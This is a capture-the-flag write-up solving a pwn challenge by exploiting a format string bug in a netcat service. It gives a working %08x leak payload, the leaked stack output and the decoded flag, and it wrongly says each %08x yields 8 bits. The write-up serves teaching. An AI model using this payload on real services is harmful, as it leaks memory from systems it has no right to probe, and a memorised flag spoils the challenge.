Rating:
Problem:
My first service I(pwn, 100 points)
"Blacky is taking his first steps at C programming for embedded systems, but he makes some mistakes. Retrieve the secret key for access."
nc 9a958a70ea8697789e52027dc12d7fe98cad7833.ctf.site 35000
Solution:
When we netcat into the service (not like we can do anything else because we don't have a binary), we can try typical attack types. Trying to overflow the buffer doesn't lead anywhere though (we'd get a segfault), so this vulnerability does not have to do with a buffer overflow, at least it's very unlikely.
The next thing you can think of trying (especially since the question infers the programmer is new), is format string issues. Mistakes such as "printf(variable)" are very common, in-fact I've seen tutorials teach it! It may not seem like a big deal at first glance, but the proper way of doing it would be "printf("%s", variable)" (assuming "variable" is a string). Why is it so bad for the first case? We can inject our own format codes and leak memory!
A helpful format string in our case is %08x, as each time we use that it will give us the next 8 bits of memory in a printout. Therefore if we just keep inserting these format strings, we can leak memory further down the stack. If the flag is there we have it. Surely enough it is.
If we use "AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x" as our input, we'll get the following in stdout:
Invalid key: AAAA00000000.0000000a.00000000.00000000.00000000.0000000a.00000000.454b4f7b.4c614269.67426566.3072647d.00000000.41414141.25303878.2e253038.782e2530
If we go ahead and put that into a hex editor, we can see "454b4f7b4c614269674265663072647d" which converts to "EKO{LaBigBef0rd}" in ASCII.
<span>Flag: EKO{LaBigBef0rd}</span>